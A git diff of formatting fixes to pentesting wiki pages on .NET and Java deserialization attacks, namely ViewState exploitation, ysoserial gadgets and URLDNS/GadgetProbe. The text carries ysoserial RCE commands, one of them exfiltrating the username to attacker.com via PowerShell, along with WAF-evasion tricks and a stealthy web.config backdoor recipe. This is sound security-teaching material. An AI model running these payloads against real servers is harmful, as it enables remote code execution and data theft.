 This class allows to s**pecify the object types of the objects that are encapsulated** in a given instance. So, this class can be used to encapsulate a source object (_ObjectDataProvider_) into a new object type and provide the properties we need (_ObjectDataProvider.MethodName_ and _ObjectDataProvider.MethodParameters_).\
-This is very useful for cases as the one presented before, because we will be able to **wrap **_**ObjectDataProvider **_**inside an **_**ExpandedWrapper** _instance and** when deserialized** this class will **create **the _**OjectDataProvider **_object that will **execute **the **function **indicated in _**MethodName**_.
+This is very useful for cases as the one presented before, because we will be able to **wrap **_**ObjectDataProvider**_** inside an **_**ExpandedWrapper** _ instance and **when deserialized** this class will **create** the _**OjectDataProvider**_ object that will **execute** the **function** indicated in _**MethodName**_.
 
 You can check this wrapper with the following code:
 
@@ -88,7 +88,7 @@ namespace ODPCustomSerialExample
 
 ## Json.Net
 
-In the [official web page](https://www.newtonsoft.com/json) it is indicated that this library allows to **Serialize and deserialize any .NET object with Json.NET's powerful JSON serializer**. So, if we could **deserialize the ObjectDataProvider gadget**, we could cause a **RCE **just deserializing an object.
+In the [official web page](https://www.newtonsoft.com/json) it is indicated that this library allows to **Serialize and deserialize any .NET object with Json.NET's powerful JSON serializer**. So, if we could **deserialize the ObjectDataProvider gadget**, we could cause a **RCE** just deserializing an object.
 
 ### Json.Net example
 
@@ -154,7 +154,7 @@ ysoserial.exe -g ObjectDataProvider -f Json.Net -c "calc.exe"
 }
 ```
 
-In this code you can** test the exploit**, just run it and you will see that a calc is executed:
+In this code you can **test the exploit**, just run it and you will see that a calc is executed:
 
 ```java
 using System;
diff --git a/pentesting-web/deserialization/basic-java-deserialization-objectinputstream-readobject.md b/pentesting-web/deserialization/basic-java-deserialization-objectinputstream-readobject.md
index 4cd39177..ed83d70c 100644
--- a/pentesting-web/deserialization/basic-java-deserialization-objectinputstream-readobject.md
+++ b/pentesting-web/deserialization/basic-java-deserialization-objectinputstream-readobject.md
@@ -4,10 +4,10 @@ In this POST it's going to be explained an example using java.io.Serializable.
 
 ## Serializable
 
-The Java `Serializable` interface (`java.io.Serializable` is a marker interface your classes must implement if they are to be **serialized **and **deserialized**. Java object serialization (writing) is done with the [ObjectOutputStream](http://tutorials.jenkov.com/java-io/objectoutputstream.html) and deserialization (reading) is done with the [ObjectInputStream](http://tutorials.jenkov.com/java-io/objectinputstream.html). 
+The Java `Serializable` interface (`java.io.Serializable` is a marker interface your classes must implement if they are to be **serialized** and **deserialized**. Java object serialization (writing) is done with the [ObjectOutputStream](http://tutorials.jenkov.com/java-io/objectoutputstream.html) and deserialization (reading) is done with the [ObjectInputStream](http://tutorials.jenkov.com/java-io/objectinputstream.html).&#x20;
 
-Lets see an example with a** class Person** which is **serializable**. This class **overwrites the readObject **function, so when **any object **of this **class **is **deserialized **this **function **is going to b **executed**.\
-In the example, the **readObject function **of the class Person calls the function `eat()` of his pet and the function `eat()` of a Dog (for some reason) calls a **calc.exe**. **We are going to see how to serialize and deserialize a Person object to execute this calculator:**
+Lets see an example with a **class Person** which is **serializable**. This class **overwrites the readObject** function, so when **any object** of this **class** is **deserialized** this **function** is going to b **executed**.\
+In the example, the **readObject function** of the class Person calls the function `eat()` of his pet and the function `eat()` of a Dog (for some reason) calls a **calc.exe**. **We are going to see how to serialize and deserialize a Person object to execute this calculator:**
 
 ```java
 import java.io.Serializable;
@@ -84,4 +84,4 @@ This example was taken from [https://medium.com/@knownsec404team/java-deserializ
 
 ### Conclusion
 
-As you can see in this very basic example, the "vulnerability" here appears because the **readObject **function is **calling other vulnerable functions**.
+As you can see in this very basic example, the "vulnerability" here appears because the **readObject** function is **calling other vulnerable functions**.
diff --git a/pentesting-web/deserialization/exploiting-__viewstate-knowing-the-secret.md b/pentesting-web/deserialization/exploiting-__viewstate-knowing-the-secret.md
index 964f6f6b..e0be26ed 100644
--- a/pentesting-web/deserialization/exploiting-__viewstate-knowing-the-secret.md
+++ b/pentesting-web/deserialization/exploiting-__viewstate-knowing-the-secret.md
@@ -1,6 +1,6 @@
-# Exploiting \__VIEWSTATE knowing the secrets
+# Exploiting \_\_VIEWSTATE knowing the secrets
 
-**The content of this post was extracted from **[**https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/**](https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/)****
+**The content of this post was extracted from** [**https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/**](https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/)****
 
 ## Introduction
 
@@ -11,7 +11,7 @@ It is normally possible to **run code on a web server where a valid ViewState ca
 * **Validation key and its algorithm** **prior** to .NET Framework version **4.5**
 * **Validation key, validation algorithm, decryption key, and decryption algorithm** in .NET Framework version 4.5 or above
 
-In order to prevent manipulation attacks, .NET Framework can** sign and encrypt** the ViewState that has been serialised using the `LosFormatter` class. It then verifies the signature using the message authentication code (MAC) validation mechanism. The `ObjectStateFormatter` class performs the signing, encryption, and verification tasks. The** keys required to perform the signing and/or encryption** mechanism can be stored in the `machineKey` section of the **`web.config`** (application level) or **`machine.config`** (machine level) files. This is normally the case when multiple web servers are used to serve the same application often behind a load balancer in a Web Farm or cluster. The following shows the `machineKey` section’s format in a configuration file of an ASP.NET application that uses .NET Framework version 2.0 or above:
+In order to prevent manipulation attacks, .NET Framework can **sign and encrypt** the ViewState that has been serialised using the `LosFormatter` class. It then verifies the signature using the message authentication code (MAC) validation mechanism. The `ObjectStateFormatter` class performs the signing, encryption, and verification tasks. The **keys required to perform the signing and/or encryption** mechanism can be stored in the `machineKey` section of the **`web.config`** (application level) or **`machine.config`** (machine level) files. This is normally the case when multiple web servers are used to serve the same application often behind a load balancer in a Web Farm or cluster. The following shows the `machineKey` section’s format in a configuration file of an ASP.NET application that uses .NET Framework version 2.0 or above:
 
 ```markup
 <machineKey validationKey="[String]"  decryptionKey="[String]" validation="[SHA1 | MD5 | 3DES | AES | HMACSHA256 | HMACSHA384 | HMACSHA512 | alg:algorithm_name]"  decryption="[Auto | DES | 3DES | AES | alg:algorithm_name]" />
@@ -22,7 +22,7 @@ It should be noted that when a `machineKey` section has not been defined within
 
 ## RCE with disabled ViewState MAC Validation
 
-In the past, it was possible to** disable the MAC validation** simply by setting the `enableViewStateMac` property to `False`. Microsoft released a patch in September 2014 [\[3\]](https://devblogs.microsoft.com/aspnet/farewell-enableviewstatemac/) to enforce the MAC validation by ignoring this property in all versions of .NET Framework. Although some of us might believe that “_the ViewState MAC can no longer be disabled_” [\[4\]](https://www.owasp.org/index.php/Anti_CSRF_Tokens_ASP.NET), it is s**till possible to disable the MAC validation feature by setting** the `AspNetEnforceViewStateMac` registry key to zero in:
+In the past, it was possible to **disable the MAC validation** simply by setting the `enableViewStateMac` property to `False`. Microsoft released a patch in September 2014 [\[3\]](https://devblogs.microsoft.com/aspnet/farewell-enableviewstatemac/) to enforce the MAC validation by ignoring this property in all versions of .NET Framework. Although some of us might believe that “_the ViewState MAC can no longer be disabled_” [\[4\]](https://www.owasp.org/index.php/Anti\_CSRF\_Tokens\_ASP.NET), it is s**till possible to disable the MAC validation feature by setting** the `AspNetEnforceViewStateMac` registry key to zero in:
 
 ```
 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v{VersionHere}
@@ -43,13 +43,13 @@ Alternatively, adding the following **dangerous setting** to the application lev
 When ViewState MAC validation has been **disabled**, the [YSoSerial.Net](https://github.com/pwntester/ysoserial.net) project can be used to generate `LosFormatter` payloads as the ViewState in order to run arbitrary code on the server.
 {% endhint %}
 
-**Prior** to the .NET Framework version **4.5**, the `__VIEWSTATE` parameter could be** encrypted whilst the MAC validation feature was disabled**. It should be noted that **most** **scanners** **do not attempt **to send an unencrypted ViewState parameter to identify this vulnerability. As a result, **manual** **testing** is required to check whether the MAC validation is disabled when the `__VIEWSTATE` parameter has been encrypted. This can be checked by sending a short random base64 string in the `__VIEWSTATE` parameter. The following URL shows an example:
+**Prior** to the .NET Framework version **4.5**, the `__VIEWSTATE` parameter could be **encrypted whilst the MAC validation feature was disabled**. It should be noted that **most** **scanners** **do not attempt** to send an unencrypted ViewState parameter to identify this vulnerability. As a result, **manual** **testing** is required to check whether the MAC validation is disabled when the `__VIEWSTATE` parameter has been encrypted. This can be checked by sending a short random base64 string in the `__VIEWSTATE` parameter. The following URL shows an example:
 
 ```
 https://victim.com/path/page.aspx?__VIEWSTATE=AAAA
 ```
 
-If the target page **responds with an error, the MAC validation feature has been disabled **otherwise it would have suppressed the MAC validation error message.\
+If the target page **responds with an error, the MAC validation feature has been disabled** otherwise it would have suppressed the MAC validation error message.\
 However, in scenarios where you cannot see the error message this trick won't work.
 
 Automated scanners should use a **payload that causes a short delay** on the server-side. This can be achieved by executing the following ASP.NET code as an example to create a 10-second delay:
@@ -76,9 +76,9 @@ string xaml_payload = @"<ResourceDictionary
 
 In older versions (**prior to 4.5**), .NET Framework uses the **`TemplateSourceDirectory`** property [\[15\]](https://docs.microsoft.com/en-us/dotnet/api/system.web.ui.control.templatesourcedirectory) when **signing** a serialised object. **Since** version **4.5** however, it uses the **`Purpose`** strings in order to create the hash. Both of these mechanisms **require the target path from the root of the application directory** and the **page name**. These parameters can be **extracted from the URL**.
 
-Applications that use an** older framework** and enforce ViewState encryption can **still accept a signed ViewState without encryption**. This means that **knowing the validation key and its algorithm is enough** to exploit a website. It seems ViewState is encrypted by default **since version 4.5** even when the `viewStateEncryptionMode` property has been set to `Never`. This means that in the latest .NET Framework versions the **decryption key and its algorithm are also required** in order to create a payload.
+Applications that use an **older framework** and enforce ViewState encryption can **still accept a signed ViewState without encryption**. This means that **knowing the validation key and its algorithm is enough** to exploit a website. It seems ViewState is encrypted by default **since version 4.5** even when the `viewStateEncryptionMode` property has been set to `Never`. This means that in the latest .NET Framework versions the **decryption key and its algorithm are also required** in order to create a payload.
 
-The ASP.NET ViewState contains a property called `ViewStateUserKey` [\[16\]](https://docs.microsoft.com/en-us/previous-versions/dotnet/articles/ms972969\(v=msdn.10\)) that can be used to mitigate risks of cross-site request forgery (CSRF) attacks [\[4\]](https://www.owasp.org/index.php/Anti_CSRF_Tokens_ASP.NET). Value of the **`ViewStateUserKey`** property (when it is not `null`**) is also used during the ViewState signing** process. Although not knowing the value of this parameter can stop our attack,** its value can often be found in the cookies or in a hidden input** parameter ([\[17\]](https://software-security.sans.org/developer-how-to/developer-guide-csrf) shows an implemented example).
+The ASP.NET ViewState contains a property called `ViewStateUserKey` [\[16\]](https://docs.microsoft.com/en-us/previous-versions/dotnet/articles/ms972969\(v=msdn.10\)) that can be used to mitigate risks of cross-site request forgery (CSRF) attacks [\[4\]](https://www.owasp.org/index.php/Anti\_CSRF\_Tokens\_ASP.NET). Value of the **`ViewStateUserKey`** property (when it is not `null`**) is also used during the ViewState signing** process. Although not knowing the value of this parameter can stop our attack, **its value can often be found in the cookies or in a hidden input** parameter ([\[17\]](https://software-security.sans.org/developer-how-to/developer-guide-csrf) shows an implemented example).
 
 ### ViewState YSoSerial.Net plugins
 
@@ -104,19 +104,19 @@ _Apart from using different gadgets, it is possible to use the `__VIEWSTATEGENER
 .\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "echo 123 > c:\windows\temp\test.txt" --generator=93D20A1B --validationalg="SHA1" --validationkey="70DBADBFF4B7A13BE67DD0B11B177936F8F3C98BCE2E0A4F222F7A769804D451ACDB196572FFF76106F33DCEA1571D061336E68B12CF0AF62D56829D2A48F1B0"
 ```
 
-_It uses the ActivitySurrogateSelector gadget by default that requires compiling the ExploitClass.cs class in YSoSerial.Net project. The ViewState payload can also be **encrypted** **to avoid WAFs when the decryptionKey value is known**:_
+_It uses the ActivitySurrogateSelector gadget by default that requires compiling the ExploitClass.cs class in YSoSerial.Net project. The ViewState payload can also be **encrypted**  **to avoid WAFs when the decryptionKey value is known**:_
 
 ```bash
 .\ysoserial.exe -p ViewState -c "foo to use ActivitySurrogateSelector" --path="/somepath/testaspx/test.aspx" --apppath="/testaspx/" --islegacy --decryptionalg="AES" --decryptionkey="34C69D15ADD80DA4788E6E3D02694230CF8E9ADFDA2708EF43CAEF4C5BC73887" --isencrypted --validationalg="SHA1" --validationkey="70DBADBFF4B7A13BE67DD0B11B177936F8F3C98BCE2E0A4F222F7A769804D451ACDB196572FFF76106F33DCEA1571D061336E68B12CF0AF62D56829D2A48F1B0"
 ```
 
 {% hint style="info" %}
-**Note: **Due to the nature of used gadgets in YSoSerial.Net, the target ASP.NET page always responds with an error even when an exploit has been executed successfully on the server-side.
+**Note:** Due to the nature of used gadgets in YSoSerial.Net, the target ASP.NET page always responds with an error even when an exploit has been executed successfully on the server-side.
 {% endhint %}
 
 #### Application path
 
- it is important to find the root of the application path in order to create a valid ViewState unless:
+&#x20;it is important to find the root of the application path in order to create a valid ViewState unless:
 
 * The application uses .NET Framework version 4.0 or below; and
 * The `__VIEWSTATEGENERATOR` parameter is known.
@@ -153,7 +153,7 @@ It seems Immunity Canvas supports creating the ViewState parameter when the vali
 * [https://github.com/0xACB/viewgen](https://github.com/0xACB/viewgen) (written in Python)
 * [https://github.com/Illuminopi/RCEvil.NET](https://github.com/Illuminopi/RCEvil.NET) (written in .NET)
 
-I think these tools currently** do not differentiate between different versions of .NET** Framework and target the legacy cryptography. Additionally, they **do not use the `ViewStateUserKey`** parameter that might be in use to stop CSRF attacks.
+I think these tools currently **do not differentiate between different versions of .NET** Framework and target the legacy cryptography. Additionally, they **do not use the `ViewStateUserKey`** parameter that might be in use to stop CSRF attacks.
 
 ## Additional Tips
 
@@ -181,7 +181,7 @@ When the `__VIEWSTATEGENERATOR` parameter is known, it can be used for the ASP.N
 
 ### **ViewState chunking to bypass WAFs**
 
-It is possible to break the `__VIEWSTATE` parameter into multiple parts when the **`MaxPageStateFieldLength`** property has been set to a **positive** **value**. Its **default** value is **negative** and it means that the **`__VIEWSTATE`** parameter** cannot be broken into multiple parts**.
+It is possible to break the `__VIEWSTATE` parameter into multiple parts when the **`MaxPageStateFieldLength`** property has been set to a **positive** **value**. Its **default** value is **negative** and it means that the **`__VIEWSTATE`** parameter **cannot be broken into multiple parts**.
 
 This might be useful to bypass some WAFs when ViewState chunking is allowed.
 
@@ -201,14 +201,14 @@ Value of the `__VIEWSTATE` parameter can be empty in the request when exploiting
 
 The `Purpose` string that is used by .NET Framework 4.5 and above to create a valid signature is different based on the used parameter. The following table shows the defined `Purpose` strings in .NET Framework:
 
-| **Input Parameter**                                        | **Purpose String**                                 |
-| ---------------------------------------------------------- | -------------------------------------------------- |
-| “\__VIEWSTATE”                                             | WebForms.HiddenFieldPageStatePersister.ClientState |
-| “\__EVENTVALIDATION”                                       | WebForms.ClientScriptManager.EventValidation       |
-| P2 in P1\|P2 in “\__dv” + ClientID + “\__hidden”           | WebForms.DetailsView.KeyTable                      |
-| P4 in P1\|P2\|P3\|P4 in “\__CALLBACKPARAM”                 | WebForms.DetailsView.KeyTable                      |
-| P3 in P1\|P2\|P3\|P4 in “\__gv” + ClientID + “\__hidden”   | WebForms.GridView.SortExpression                   |
-| P4 in P1\|P2\|P3\|P4 in “\__gv” + ClientID + “\__hidden”   | WebForms.GridView.DataKeys                         |
+| **Input Parameter**                                          | **Purpose String**                                 |
+| ------------------------------------------------------------ | -------------------------------------------------- |
+| “\_\_VIEWSTATE”                                              | WebForms.HiddenFieldPageStatePersister.ClientState |
+| “\_\_EVENTVALIDATION”                                        | WebForms.ClientScriptManager.EventValidation       |
+| P2 in P1\|P2 in “\_\_dv” + ClientID + “\_\_hidden”           | WebForms.DetailsView.KeyTable                      |
+| P4 in P1\|P2\|P3\|P4 in “\_\_CALLBACKPARAM”                  | WebForms.DetailsView.KeyTable                      |
+| P3 in P1\|P2\|P3\|P4 in “\_\_gv” + ClientID + “\_\_hidden”   | WebForms.GridView.SortExpression                   |
+| P4 in P1\|P2\|P3\|P4 in “\_\_gv” + ClientID + “\_\_hidden”   | WebForms.GridView.DataKeys                         |
 
 The table above shows all input parameters that could be targeted.
 
@@ -230,7 +230,7 @@ In addition to this, ASP.NET web applications can ignore the MAC validation erro
 
 ## Web.config as a backdoor
 
-If attackers can **change** the **`web.config`** within the root of an application, they can **easily run code** on the server. However, embedding a stealthy backdoor on the application might be a good choice for an attacker. This can be done by **disabling the MAC validation** and setting the `viewStateEncryptionMode` property to `Always`. This means that all ASP.NET pages that do not set the `ViewStateEncryptionMode` property to `Auto` or `Never` always use encrypted ViewState parameters. However, as the** ViewState do not use the MAC validation feature, they are now vulnerable to remote code execution via deserialising untrusted data**. The following shows an example:
+If attackers can **change** the **`web.config`** within the root of an application, they can **easily run code** on the server. However, embedding a stealthy backdoor on the application might be a good choice for an attacker. This can be done by **disabling the MAC validation** and setting the `viewStateEncryptionMode` property to `Always`. This means that all ASP.NET pages that do not set the `ViewStateEncryptionMode` property to `Auto` or `Never` always use encrypted ViewState parameters. However, as the **ViewState do not use the MAC validation feature, they are now vulnerable to remote code execution via deserialising untrusted data**. The following shows an example:
 
 ```markup
 <configuration>
diff --git a/pentesting-web/deserialization/exploiting-__viewstate-parameter.md b/pentesting-web/deserialization/exploiting-__viewstate-parameter.md
index 6afc5a9a..5ac5b59f 100644
--- a/pentesting-web/deserialization/exploiting-__viewstate-parameter.md
+++ b/pentesting-web/deserialization/exploiting-__viewstate-parameter.md
@@ -1,8 +1,8 @@
-# Exploiting \__VIEWSTATE without knowing the secrets
+# Exploiting \_\_VIEWSTATE without knowing the secrets
 
 ## What is ViewState
 
-**ViewState **is the method that the ASP.NET framework uses by default to p**reserve page and control values between web pages**. When the HTML for the page is rendered, the current state of the page and values that need to be retained during postback are serialized into base64-encoded strings and output in the ViewState hidden field or fields.\
+**ViewState** is the method that the ASP.NET framework uses by default to p**reserve page and control values between web pages**. When the HTML for the page is rendered, the current state of the page and values that need to be retained during postback are serialized into base64-encoded strings and output in the ViewState hidden field or fields.\
 The following properties or combination of properties apply to ViewState information:
 
 * Base64
@@ -38,19 +38,19 @@ ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "power
 
 ### Test case 1.5 – Like Test case 1 but the ViewState cookie isn't sent by the server
 
-Developers can **remove ViewState **from becoming part of an HTTP Request (the user won't receive this cookie). \
-One may assume that if **ViewState **is **not present**, their implementation is **secure **from any potential vulnerabilities arising with ViewState deserialization.\
-However, that is not the case. If we **add ViewState parameter **to the request body and send our serialized payload created using ysoserial, we will still be able to achieve **code execution **as shown in **Case 1**.
+Developers can **remove ViewState** from becoming part of an HTTP Request (the user won't receive this cookie). \
+One may assume that if **ViewState** is **not present**, their implementation is **secure** from any potential vulnerabilities arising with ViewState deserialization.\
+However, that is not the case. If we **add ViewState parameter** to the request body and send our serialized payload created using ysoserial, we will still be able to achieve **code execution** as shown in **Case 1**.
 
 ### Test Case: 2 – .Net < 4.5 and EnableViewStateMac=true & ViewStateEncryptionMode=false
 
-In order to **enable ViewState MAC** for a **specific page **we need to make following changes on a specific aspx file:
+In order to **enable ViewState MAC** for a **specific page** we need to make following changes on a specific aspx file:
 
 ```bash
 <%@ Page Language="C#" AutoEventWireup="true" CodeFile="hello.aspx.cs" Inherits="hello" enableViewStateMac="True"%>
 ```
 
-We can also do it for **overall **application by setting it on the **web.config** file as shown below:
+We can also do it for **overall** application by setting it on the **web.config** file as shown below:
 
 ```markup
 <?xml version="1.0" encoding="UTF-8"?>
@@ -67,7 +67,7 @@ As the parameter is MAC protected this time to successfully execute the attack w
 
 ![](https://www.notsosecure.com/wp-content/uploads/2019/06/2.0.png)
 
-You can try to use [**Blacklist3r(AspDotNetWrapper.exe) **](https://github.com/NotSoSecure/Blacklist3r/tree/master/MachineKey/AspDotNetWrapper)to find the key used.
+You can try to use [**Blacklist3r(AspDotNetWrapper.exe)** ](https://github.com/NotSoSecure/Blacklist3r/tree/master/MachineKey/AspDotNetWrapper)to find the key used.
 
 ```
 AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata /wEPDwUKLTkyMTY0MDUxMg9kFgICAw8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YWRkbdrqZ4p5EfFa9GPqKfSQRGANwLs= --decrypt --purpose=viewstate --modifier=6811C9FF --macdecode --TargetPagePath "/Savings-and-Investments/Application/ContactDetails.aspx" -f out.txt --IISDirPath="/"
@@ -86,7 +86,7 @@ ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell.exe Inv
 --generator = {__VIWESTATEGENERATOR parameter value}
 ```
 
-In cases where `_VIEWSTATEGENERATOR` parameter **isn't sent **by the server you **don't** need to **provide **the `--generator` parameter **but these ones**:
+In cases where `_VIEWSTATEGENERATOR` parameter **isn't sent** by the server you **don't** need to **provide** the `--generator` parameter **but these ones**:
 
 ```bash
 --apppath="/" --path="/hello.aspx"
@@ -98,9 +98,9 @@ In this case Burp doesn't find if the parameter is protected with MAC because it
 
 ![](https://www.notsosecure.com/wp-content/uploads/2019/06/3.0.png)
 
-**In this case the ** [**Blacklist3r**](https://github.com/NotSoSecure/Blacklist3r/tree/master/MachineKey/AspDotNetWrapper)** module is under development...**
+**In this case the** [**Blacklist3r**](https://github.com/NotSoSecure/Blacklist3r/tree/master/MachineKey/AspDotNetWrapper) **module is under development...**
 
-**Prior to .NET 4.5**, ASP.NET can **accept **an **unencrypted **_`__VIEWSTATE`_parameter from the users **even **if **`ViewStateEncryptionMode`** has been set to _**Always**_. ASP.NET **only checks **the **presence **of the **`__VIEWSTATEENCRYPTED`** parameter in the request. **If one removes this parameter, and sends the unencrypted payload, it will still be processed.**
+**Prior to .NET 4.5**, ASP.NET can **accept** an **unencrypted** _`__VIEWSTATE`_parameter from the users **even** if **`ViewStateEncryptionMode`** has been set to _**Always**_. ASP.NET **only checks** the **presence** of the **`__VIEWSTATEENCRYPTED`** parameter in the request. **If one removes this parameter, and sends the unencrypted payload, it will still be processed.**
 
 Threfore, if the Machinekey is known (e.g. via a directory traversal issue), [**YSoSerial.Net**](https://github.com/pwntester/ysoserial.net) command used in the **Case 2**, can be used to perform RCE using ViewState deserialization vulnerability.
 
@@ -126,7 +126,7 @@ As in the previous case Burp doesn't identify if the request is MAC protected be
 
 ![](https://www.notsosecure.com/wp-content/uploads/2019/06/4.0.png)
 
-You can try to use [**Blacklist3r(AspDotNetWrapper.exe) **](https://github.com/NotSoSecure/Blacklist3r/tree/master/MachineKey/AspDotNetWrapper)to find the key being used:
+You can try to use [**Blacklist3r(AspDotNetWrapper.exe)** ](https://github.com/NotSoSecure/Blacklist3r/tree/master/MachineKey/AspDotNetWrapper)to find the key being used:
 
 ```
 AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata bcZW2sn9CbYxU47LwhBs1fyLvTQu6BktfcwTicOfagaKXho90yGLlA0HrdGOH6x/SUsjRGY0CCpvgM2uR3ba1s6humGhHFyr/gz+EP0fbrlBEAFOrq5S8vMknE/ZQ/8NNyWLwg== --decrypt --purpose=viewstate  --valalgo=sha1 --decalgo=aes --IISDirPath "/" --TargetPagePath "/Content/default.aspx"
@@ -140,13 +140,13 @@ For a more detailed description for IISDirPath and TargetPagePath [refer here](h
 
 ![](https://www.notsosecure.com/wp-content/uploads/2019/06/4.1.png)
 
-Once a valid Machine key is identified,** the next step is to generate a serialized payload using ** [**YSoSerial.Net**](https://github.com/pwntester/ysoserial.net)
+Once a valid Machine key is identified, **the next step is to generate a serialized payload using** [**YSoSerial.Net**](https://github.com/pwntester/ysoserial.net)
 
 ```
 ysoserial.exe -p ViewState  -g TextFormattingRunProperties -c "powershell.exe Invoke-WebRequest -Uri http://attacker.com/$env:UserName" --path="/content/default.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="F6722806843145965513817CEBDECBB1F94808E4A6C0B2F2"  --validationalg="SHA1" --validationkey="C551753B0325187D1759B4FB055B44F7C5077B016C02AF674E8DE69351B69FEFD045A267308AA2DAB81B69919402D7886A6E986473EEEC9556A9003357F5ED45"
 ```
 
-If you have the value of `__VIEWSTATEGENERATOR` you can try to **use **the `--generator` parameter with that value and **omit **the parameters `--path` and `--apppath`
+If you have the value of `__VIEWSTATEGENERATOR` you can try to **use** the `--generator` parameter with that value and **omit** the parameters `--path` and `--apppath`
 
 ![](https://www.notsosecure.com/wp-content/uploads/2019/06/4.2.png)
 
@@ -154,16 +154,16 @@ If the ViewState deserialization vulnerability is successfully exploited, an att
 
 ### Test Case 6 – ViewStateUserKeys is being used
 
-The **ViewStateUserKey **property can be used to **defend **against a **CSRF attack**. If such a key has been defined in the application and we try to generate the **ViewState **payload with the methods discussed till now, the** payload won’t be processed by the application**.\
+The **ViewStateUserKey** property can be used to **defend** against a **CSRF attack**. If such a key has been defined in the application and we try to generate the **ViewState** payload with the methods discussed till now, the **payload won’t be processed by the application**.\
 You need to use one more parameter in order to create correctly the payload:
 
 ```bash
 --viewstateuserkey="randomstringdefinedintheserver"
 ```
 
-### Result of a Successful Exploitation <a href="poc" id="poc"></a>
+### Result of a Successful Exploitation <a href="#poc" id="poc"></a>
 
-For all the test cases, if the ViewState YSoSerial.Net payload works **successfully **then the server responds with “**500 Internal server error**” having response content “**The state information is invalid for this page and might be corrupted**” and we get the OOB request as shown in Figures below:
+For all the test cases, if the ViewState YSoSerial.Net payload works **successfully** then the server responds with “**500 Internal server error**” having response content “**The state information is invalid for this page and might be corrupted**” and we get the OOB request as shown in Figures below:
 
 ![](https://www.notsosecure.com/wp-content/uploads/2019/06/5.0POC-of-Seccuessful-exploitation.png)
 
diff --git a/pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.md b/pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.md
index 0a023292..cea7677f 100644
--- a/pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.md
+++ b/pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.md
@@ -9,9 +9,9 @@ public final class URL implements java.io.Serializable {
 ```
 
 This class have a **curious behaviour.** From the documentation: “**Two hosts are considered equivalent if both host names can be resolved into the same IP addresses**”.\
-Then, every-time an URL object calls **any **of the **functions `equals`** or **`hashCode`** a **DNS request **to get the IP Address is going to be **sent**.
+Then, every-time an URL object calls **any** of the **functions `equals`** or **`hashCode`** a **DNS request** to get the IP Address is going to be **sent**.
 
-**Calling **the function **`hashCode`** **from **an **URL **object is fairly easy, it's enough to insert this object inside a `HashMap` that is going to be deserialized. This is because **at the end** of the **`readObject`** function from `HashMap` this code is executed:
+**Calling** the function **`hashCode`** **from** an **URL** object is fairly easy, it's enough to insert this object inside a `HashMap` that is going to be deserialized. This is because **at the end** of the **`readObject`** function from `HashMap` this code is executed:
 
 ```java
 private void readObject(java.io.ObjectInputStream s)
@@ -23,7 +23,7 @@ private void readObject(java.io.ObjectInputStream s)
     }
 ```
 
-It is **going **the **execute **`putVal` with every value inside the `HashMap`. But, more relevant is the call to `hash` with every value. This is the code of the `hash` function:
+It is **going** the **execute** `putVal` with every value inside the `HashMap`. But, more relevant is the call to `hash` with every value. This is the code of the `hash` function:
 
 ```java
 static final int hash(Object key) {
@@ -32,7 +32,7 @@ static final int hash(Object key) {
 }
 ```
 
-As you can observe, **when deserializing **a **`HashMap`** the function `hash` is going to **be executed with every object** and **during **the **`hash`** execution** it's going to be executed `.hashCode()` of the object**. Therefore, if you **deserializes **a **`HashMap`** **containing **a **URL **object, the **URL object** will **execute **`.hashCode()`.
+As you can observe, **when deserializing** a **`HashMap`** the function `hash` is going to **be executed with every object** and **during** the **`hash`** execution **it's going to be executed `.hashCode()` of the object**. Therefore, if you **deserializes** a **`HashMap`** **containing** a **URL** object, the **URL object** will **execute** `.hashCode()`.
 
 Now, lets take a look to the code of `URLObject.hashCode()` :
 
@@ -61,9 +61,9 @@ As you can see, when a `URLObject` executes`.hashCode()` it is called `hashCode(
         [   ...   ]
 ```
 
-You can see that a `getHostAddress` is executed to the domain,** launching a DNS query**.
+You can see that a `getHostAddress` is executed to the domain, **launching a DNS query**.
 
-Therefore, this class can be **abused **in order to **launch **a **DNS query **to **demonstrate **that **deserialization **is possible, or even to **exfiltrate information **(you can append as subdomain the output of a command execution).
+Therefore, this class can be **abused** in order to **launch** a **DNS query** to **demonstrate** that **deserialization** is possible, or even to **exfiltrate information** (you can append as subdomain the output of a command execution).
 
 ### URLDNS payload code example
 
@@ -141,13 +141,13 @@ class SilentURLStreamHandler extends URLStreamHandler {
 
 You can download [**GadgetProbe**](https://github.com/BishopFox/GadgetProbe) from the Burp Suite App Store (Extender).
 
-**GadgetProbe** will try to figure out if some **Java classes exist** on the Java class of the server so you can know **if **it's **vulnerable **to some known exploit.
+**GadgetProbe** will try to figure out if some **Java classes exist** on the Java class of the server so you can know **if** it's **vulnerable** to some known exploit.
 
 ### How does it work
 
-**GadgetProbe **will use the same **DNS payload of the previous section** but **before **running the DNS query it will** try to deserialize an arbitrary class**. If the **arbitrary class exists**, the **DNS query **will be **sent **and GadgProbe will note that this class exist. If the **DNS **request is **never sent**, this means that the **arbitrary class wasn't deserialized **successfully so either it's not present or it''s** not serializable/exploitable**.
+**GadgetProbe** will use the same **DNS payload of the previous section** but **before** running the DNS query it will **try to deserialize an arbitrary class**. If the **arbitrary class exists**, the **DNS query** will be **sent** and GadgProbe will note that this class exist. If the **DNS** request is **never sent**, this means that the **arbitrary class wasn't deserialized** successfully so either it's not present or it''s **not serializable/exploitable**.
 
-Inside the github, [**GadgetProbe has some wordlists**](https://github.com/BishopFox/GadgetProbe/tree/master/wordlists)** **with Java classes for being tested.
+Inside the github, [**GadgetProbe has some wordlists**](https://github.com/BishopFox/GadgetProbe/tree/master/wordlists) **** with Java classes for being tested.
 
 ![](<../../.gitbook/assets/intruder4 (1) (1) (1).gif>)
 
